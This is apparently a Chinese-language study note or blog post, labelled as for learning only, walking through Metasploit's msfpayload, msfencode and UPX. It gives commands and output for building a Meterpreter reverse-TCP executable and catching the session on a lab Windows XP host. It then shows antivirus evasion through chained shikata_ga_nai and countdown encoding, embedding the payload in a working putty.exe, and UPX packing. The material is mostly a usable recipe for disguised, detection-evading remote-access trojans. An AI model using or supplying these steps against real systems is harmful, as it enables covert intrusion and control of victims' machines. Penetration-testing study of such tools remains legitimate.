!!!笔记仅供学习交流使用,请勿进行其他用途!!!
CONTENTS
msfpayload的使用方法:
使用msfpayload生成payload:
root@kali:~# msfpayload Usage: /opt/metasploit/apps/pro/msf3/msfpayload [<options>] <payload> [var=val] <[S]ummary|C|Cs[H]arp|[P]erl|Rub[Y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar|Pytho[N]> OPTIONS: -h Help banner -l List available payloads #==>>参看可用的payload: root@kali:~# msfpayload -l Framework Payloads (335 total) ============================== Name Description ---- ----------- 。。。。。。 。。。。。。 #==>>使用某个payload,并且输入“O”(大写字母O)查看选项: root@kali:~# msfpayload windows/meterpreter/reverse_tcp O Name: Windows Meterpreter (Reflective Injection), Reverse TCP Stager Module: payload/windows/meterpreter/reverse_tcp Platform: Windows Arch: x86 Needs Admin: No Total size: 287 Rank: Normal Provided by: skape <mmiller@hick.org> sf <stephen_fewer@harmonysecurity.com> hdm <hdm@metasploit.com> Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (accepted: seh, thread, process, none) LHOST 10.10.10.130 yes The listen address LPORT 4444 yes The listen port Description: Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged) #==>>LHOST和LPORT都是正确的,直接生成可执行文件 root@kali:~# msfpayload windows/meterpreter/reverse_tcp X > test.exe Created by msfpayload (http://www.metasploit.com). Payload: windows/meterpreter/reverse_tcp Length: 287 Options: {"LHOST"=>"10.10.10.130"}
将该可执行文件上传到WinXPSP2中,然后进入msf中:
#==>>首先找到对应的模块 msf > search multi/handler Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- 。。。。。。 exploit/multi/handler manual Generic Payload Handler 。。。。。。 msf > use exploit/multi/handler msf exploit(handler) > show payloads 。。。。。。 #==>>找到和生成exe文件相对应的payload msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(handler) >show options #==>>查看,修改选项 Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (accepted: seh, thread, process, none) LHOST yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(handler) > set LHOST 10.10.10.130 LHOST => 10.10.10.130 msf exploit(handler) > exploit #==>>msf开始监听后,就可以在XP中执行test.exe文件,就会发现渗透成功了 [*] Started reverse handler on 10.10.10.130:4444 [*] Starting the payload handler... [*] Sending stage (769536 bytes) to 10.10.10.132 [*] Meterpreter session 1 opened (10.10.10.130:4444 -> 10.10.10.132:1047) at 2014-05-12 17:44:06 +0800 meterpreter > #==>>渗透成功
我们用msfpayload直接生成的payload非常容易被检测为木马,这里需要进行下免杀处理。先笔记个网址【 https://www.virustotal.com/zh-cn 】,可以在线检测木马。
msfencode:
root@kali:~/payloadtest# msfencode -h Usage: /opt/metasploit/apps/pro/msf3/msfencode <options> OPTIONS: -a <opt> The architecture to encode as -b <opt> The list of characters to avoid: '\x00\xff' -c <opt> The number of times to encode the data -d <opt> Specify the directory in which to look for EXE templates -e <opt> The encoder to use -h Help banner -i <opt> Encode the contents of the supplied file path -k Keep template working; run payload in new thread (use with -x) -l List available encoders -m <opt> Specifies an additional module search path -n Dump encoder information -o <opt> The output file -p <opt> The platform to encode for -s <opt> The maximum size of the encoded data -t <opt> The output format: bash,c,csharp,dw,dword,java,js_be,js_le,num,perl,pl,powershell,ps1,py,python,raw,rb,ruby,sh,vbapplication,vbscript,asp,aspx,aspx-exe,dll,elf,exe,exe-only,exe-service,exe-small,loop-vbs,macho,msi,msi-nouac,osx-app,psh,psh-net,psh-reflection,vba,vba-exe,vbs,war -v Increase verbosity -x <opt> Specify an alternate executable template #==>>可用的编码器 root@kali:~/payloadtest# msfencode -l Framework Encoders ================== Name Rank Description ---- ---- ----------- cmd/generic_sh good Generic Shell Variable Substitution Command Encoder cmd/ifs low Generic ${IFS} Substitution Command Encoder cmd/powershell_base64 excellent Powershell Base64 Command Encoder cmd/printf_php_mq manual printf(1) via PHP magic_quotes Utility Command Encoder generic/eicar manual The EICAR Encoder generic/none normal The "none" Encoder mipsbe/byte_xori normal Byte XORi Encoder mipsbe/longxor normal XOR Encoder mipsle/byte_xori normal Byte XORi Encoder mipsle/longxor normal XOR Encoder php/base64 great PHP Base64 Encoder ppc/longxor normal PPC LongXOR Encoder ppc/longxor_tag normal PPC LongXOR Encoder sparc/longxor_tag normal SPARC DWORD XOR Encoder x64/xor normal XOR Encoder x86/add_sub manual Add/Sub Encoder x86/alpha_mixed low Alpha2 Alphanumeric Mixedcase Encoder x86/alpha_upper low Alpha2 Alphanumeric Uppercase Encoder x86/avoid_underscore_tolower manual Avoid underscore/tolower x86/avoid_utf8_tolower manual Avoid UTF8/tolower x86/bloxor manual BloXor - A Metamorphic Block Based XOR Encoder x86/call4_dword_xor normal Call+4 Dword XOR Encoder x86/context_cpuid manual CPUID-based Context Keyed Payload Encoder x86/context_stat manual stat(2)-based Context Keyed Payload Encoder x86/context_time manual time(2)-based Context Keyed Payload Encoder x86/countdown normal Single-byte XOR Countdown Encoder x86/fnstenv_mov normal Variable-length Fnstenv/mov Dword XOR Encoder x86/jmp_call_additive normal Jump/Call XOR Additive Feedback Encoder x86/nonalpha low Non-Alpha Encoder x86/nonupper low Non-Upper Encoder x86/opt_sub manual Sub Encoder (optimised) x86/shikata_ga_nai excellent Polymorphic XOR Additive Feedback Encoder x86/single_static_bit manual Single Static Bit x86/unicode_mixed manual Alpha2 Alphanumeric Unicode Mixedcase Encoder x86/unicode_upper manual Alpha2 Alphanumeric Unicode Uppercase Encoder
简单的使用实例:
#==>>使用msfpayload生成payload,使用R关键字输出原始数据,然后通过管道符号| 送到msfencode中,msfencode使用shikata_ga_nai编码一次,输出exe文件格式,输出名称为test2.exe root@kali:~/payloadtest# msfpayload windows/meterpreter/reverse_tcp R | msfencode -e x86/shikata_ga_nai -c 1 -t exe -o test2.exe [*] x86/shikata_ga_nai succeeded with size 314 (iteration=1) #==>>使用msfpayload生成payload,使用R关键字输出原始数据,将原始数据保存在test.raw文件中,msfencode使用shikata_ga_nai编码一次,输出exe文件格式,输入数据来自test.raw,输出名称为test2.exe root@kali:~/payloadtest# msfpayload windows/meterpreter/reverse_tcp R > test.raw root@kali:~/payloadtest# msfencode -e x86/shikata_ga_nai -c 1 -t exe -i test.raw -o test3.exe [*] x86/shikata_ga_nai succeeded with size 314 (iteration=1) #==>>msfencode使用shikata_ga_nai编码一次,输出原始数据,输入数据来自test.raw,然后将输出的原始数据通过管道符号再次送到msfencode中,这里在使用countdown编码一次,输出exe文件格式,输出名称为test4.exe root@kali:~/payloadtest# msfencode -e x86/shikata_ga_nai -c 1 -i test.raw -t raw | msfencode -e x86/countdown -c 1 -t exe -o test4.exe [*] x86/shikata_ga_nai succeeded with size 314 (iteration=1) [*] x86/countdown succeeded with size 332 (iteration=1) #==>>msfencode使用shikata_ga_nai编码一次,输出exe文件格式,输入数据来自test.raw,输出名称为sickputty.exe,不使用默认的编码模板,使用putty.exe作为编码模板(-x 选项),同时生成的sickputty.exe执行时依然可以运行putty(-k选项) root@kali:~/payloadtest# msfencode -e x86/shikata_ga_nai -c 1 -t exe -i test.raw -o sickputty.exe -x ./putty.exe -k [*] x86/shikata_ga_nai succeeded with size 314 (iteration=1)
UPX:
root@kali:~/payloadtest# upx Ultimate Packer for eXecutables Copyright (C) 1996 - 2011 UPX 3.08 Markus Oberhumer, Laszlo Molnar & John Reiser Dec 12th 2011 Usage: upx [-123456789dlthVL] [-qvfk] [-o file] file.. Commands: -1 compress faster -9 compress better -d decompress -l list compressed file -t test compressed file -V display version number -h give more help -L display software license Options: -q be quiet -v be verbose -oFILE write output to 'FILE' -f force compression of suspicious files -k keep backup files file.. executables to (de)compress Type 'upx --help' for more detailed help. UPX comes with ABSOLUTELY NO WARRANTY; for details visit http://upx.sf.net root@kali:~/payloadtest# upx -h Ultimate Packer for eXecutables Copyright (C) 1996 - 2011 UPX 3.08 Markus Oberhumer, Laszlo Molnar & John Reiser Dec 12th 2011 Usage: upx [-123456789dlthVL] [-qvfk] [-o file] file.. Commands: -1 compress faster -9 compress better --best compress best (can be slow for big files) -d decompress -l list compressed file -t test compressed file -V display version number -h give this help -L display software license Options: -q be quiet -v be verbose -oFILE write output to 'FILE' -f force compression of suspicious files --no-color, --mono, --color, --no-progress change look Compression tuning options: --brute try all available compression methods & filters [slow] --ultra-brute try even more compression variants [very slow] Backup options: -k, --backup keep backup files --no-backup no backup files [default] Overlay options: --overlay=copy copy any extra data attached to the file [default] --overlay=strip strip any extra data attached to the file [DANGEROUS] --overlay=skip don't compress a file with an overlay Options for djgpp2/coff: --coff produce COFF output [default: EXE] Options for dos/com: --8086 make compressed com work on any 8086 Options for dos/exe: --8086 make compressed exe work on any 8086 --no-reloc put no relocations in to the exe header Options for dos/sys: --8086 make compressed sys work on any 8086 Options for ps1/exe: --8-bit uses 8 bit size compression [default: 32 bit] --8mib-ram 8 megabyte memory limit [default: 2 MiB] --boot-only disables client/host transfer compatibility --no-align don't align to 2048 bytes [enables: --console-run] Options for watcom/le: --le produce LE output [default: EXE] Options for win32/pe, rtm32/pe & arm/pe: --compress-exports=0 do not compress the export section --compress-exports=1 compress the export section [default] --compress-icons=0 do not compress any icons --compress-icons=1 compress all but the first icon --compress-icons=2 compress all but the first icon directory [default] --compress-icons=3 compress all icons --compress-resources=0 do not compress any resources at all --keep-resource=list do not compress resources specified by list --strip-relocs=0 do not strip relocations --strip-relocs=1 strip relocations [default] file.. executables to (de)compress This version supports: AMD64-darwin.macho Mach/AMD64 ARMEL-darwin.macho Mach/ARMEL amd64-linux.elf linux/ElfAMD amd64-linux.kernel.vmlinux vmlinux/AMD64 arm-linux.elf linux/armel arm-linux.kernel.vmlinux vmlinux/armel arm-wince.pe arm/pe armeb-linux.elf linux/armeb armeb-linux.kernel.vmlinux vmlinux/armeb armel-linux.kernel.vmlinuz vmlinuz/armel fat-darwin.macho Mach/fat i086-dos16.com dos/com i086-dos16.exe dos/exe i086-dos16.sys dos/sys i386-bsd.elf.execve BSD/386 i386-darwin.macho Mach/i386 i386-dos32.djgpp2.coff djgpp2/coff i386-dos32.tmt.adam tmt/adam i386-dos32.watcom.le watcom/le i386-freebsd.elf BSD/elf386 i386-linux.elf linux/elf386 i386-linux.elf.execve linux/386 i386-linux.elf.shell linux/sh386 i386-linux.kernel.bvmlinuz bvmlinuz/386 i386-linux.kernel.vmlinux vmlinux/386 i386-linux.kernel.vmlinuz vmlinuz/386 i386-netbsd.elf netbsd/elf386 i386-openbsd.elf opnbsd/elf386 i386-win32.pe win32/pe m68k-atari.tos atari/tos mips-linux.elf linux/mipseb mipsel-linux.elf linux/mipsel mipsel.r3000-ps1 ps1/exe powerpc-darwin.macho Mach/ppc32 powerpc-linux.elf linux/ElfPPC powerpc-linux.kernel.vmlinux vmlinux/ppc32 UPX comes with ABSOLUTELY NO WARRANTY; for details visit http://upx.sf.net root@kali:~/payloadtest#
简单的使用实例:
#==>>使用压缩等级为5,进行压缩test4.exe root@kali:~/payloadtest# upx -5 test4.exe Ultimate Packer for eXecutables Copyright (C) 1996 - 2011 UPX 3.08 Markus Oberhumer, Laszlo Molnar & John Reiser Dec 12th 2011 File size Ratio Format Name -------------------- ------ ----------- ----------- 73802 -> 48128 65.21% win32/pe test4.exe Packed 1 file.
其他参考链接:
【 http://www.offensive-security.com/metasploit-unleashed/Msfpayload 】
发表评论